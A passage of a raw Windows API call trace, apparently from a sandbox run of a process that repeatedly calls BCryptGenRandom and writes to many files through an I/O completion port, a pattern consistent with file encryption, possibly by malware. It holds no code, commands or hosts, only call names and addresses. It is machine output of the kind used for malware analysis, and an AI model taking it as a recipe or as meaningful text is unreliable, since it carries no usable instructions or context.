lpOverlapped=0x3eb0158) returned 1 [0093.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.518] WriteFile (in: hFile=0x11a0, lpBuffer=0x3ef01fc, nNumberOfBytesToWrite=0xef30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef01c8 | out: lpBuffer=0x3ef01fc, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef01c8) returned 0x0 [0093.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0095.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0095.263] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0095.267] calloc (_Count=0x40, _Size=0x4) returned 0x3ef0008 [0095.267] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0095.267] free (_Block=0x3ef0008) [0095.267] calloc (_Count=0x41, _Size=0x4) returned 0x3ef0008 [0095.267] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0095.267] free (_Block=0x3ef0008) [0095.267] free (_Block=0x2071818) [0095.267] free (_Block=0x77d800) [0095.268] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0095.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0095.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0095.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0095.634] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0095.634] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0095.634] free (_Block=0x77d800) [0095.634] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0095.634] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0095.634] free (_Block=0x2071818) [0095.634] free (_Block=0x2071928) [0095.634] free (_Block=0x77d908) [0095.634] WriteFile (in: hFile=0x330, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0095.639] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0095.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.702] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0095.702] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0095.704] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0095.704] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0095.704] free (_Block=0x77d800) [0095.704] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0095.704] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0095.704] free (_Block=0x2071818) [0095.704] free (_Block=0x2071928) [0095.704] free (_Block=0x77d908) [0095.705] WriteFile (in: hFile=0x330, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0095.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0095.882] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.885] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0095.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0095.888] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0095.888] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0095.888] free (_Block=0x77d800) [0095.888] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0095.888] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0095.889] free (_Block=0x2071818) [0095.889] free (_Block=0x2071928) [0095.889] free (_Block=0x77d908) [0095.889] WriteFile (in: hFile=0x1194, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0095.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0095.929] CloseHandle (hObject=0x330) returned 1 [0095.930] free (_Block=0x3d70048) [0095.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0095.930] WriteFile (in: hFile=0x1194, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0095.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0095.932] CloseHandle (hObject=0x13e0) returned 1 [0095.934] free (_Block=0x3db00b8) [0095.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0096.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0096.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0096.131] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0096.131] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0096.131] free (_Block=0x77d800) [0096.131] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0096.131] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0096.131] free (_Block=0x2071818) [0096.131] free (_Block=0x2071928) [0096.131] free (_Block=0x77d908) [0096.131] WriteFile (in: hFile=0x334, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0096.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0096.132] WriteFile (in: hFile=0x334, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0096.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0096.194] ReadFile (in: hFile=0x334, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0096.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0096.258] ReadFile (in: hFile=0x13e0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0096.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0096.282] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0096.282] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0096.288] WriteFile (in: hFile=0x330, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0096.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0097.214] ReadFile (in: hFile=0x13e4, lpBuffer=0x3df015c, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0097.214] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0097.215] CloseHandle (hObject=0x13e4) returned 1 [0097.216] free (_Block=0x3df0128) [0097.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0097.260] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0097.263] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0097.266] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.266] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.266] free (_Block=0x77d800) [0097.266] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.266] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.267] free (_Block=0x2071818) [0097.267] free (_Block=0x2071928) [0097.267] free (_Block=0x77d908) [0097.267] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0097.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0097.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0097.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.295] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0097.296] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.296] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.296] free (_Block=0x77d800) [0097.296] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.296] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.296] free (_Block=0x2071818) [0097.296] free (_Block=0x2071928) [0097.296] free (_Block=0x77d908) [0097.296] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0097.297] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0097.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0097.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0097.330] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.330] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.330] free (_Block=0x77d800) [0097.330] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.330] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.331] free (_Block=0x2071818) [0097.331] free (_Block=0x2071928) [0097.331] free (_Block=0x77d908) [0097.331] WriteFile (in: hFile=0x1194, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0097.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0097.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.356] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0097.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0097.362] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.362] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.362] free (_Block=0x77d800) [0097.362] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.362] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.363] free (_Block=0x2071818) [0097.363] free (_Block=0x2071928) [0097.363] free (_Block=0x77d908) [0097.363] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0097.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0100.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0100.946] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0100.951] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.951] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.951] free (_Block=0x77d800) [0100.951] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.951] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.952] free (_Block=0x2071818) [0100.952] free (_Block=0x2071928) [0100.952] free (_Block=0x77d908) [0100.952] WriteFile (in: hFile=0x3b0, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0100.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0100.963] CloseHandle (hObject=0x13e4) returned 1 [0100.968] free (_Block=0x1ff1e60) [0100.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0100.997] CloseHandle (hObject=0x3b4) returned 1 [0101.001] free (_Block=0x3db00b8) [0101.001] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0101.552] CloseHandle (hObject=0x13e4) returned 1 [0101.556] free (_Block=0x3e30008) [0101.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0101.568] CloseHandle (hObject=0xcac) returned 1 [0101.577] free (_Block=0x3d70048) [0101.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0101.614] CloseHandle (hObject=0xcb4) returned 1 [0101.616] free (_Block=0x3ef0008) [0101.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0101.633] CloseHandle (hObject=0xca0) returned 1 [0101.634] free (_Block=0x3e70078) [0101.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0101.653] ReadFile (in: hFile=0xcb0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x2186, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0101.682] ReadFile (in: hFile=0xca0, lpBuffer=0x3e700ac, nNumberOfBytesToRead=0x14ff, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70078 | out: lpBuffer=0x3e700ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70078) returned 1 [0101.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0101.922] ReadFile (in: hFile=0xef8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1126, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0101.929] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0102.554] CloseHandle (hObject=0xf00) returned 1 [0102.556] free (_Block=0x1ff1e60) [0102.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0102.606] CloseHandle (hObject=0xf04) returned 1 [0102.613] free (_Block=0x3df0008) [0102.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0102.624] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.626] 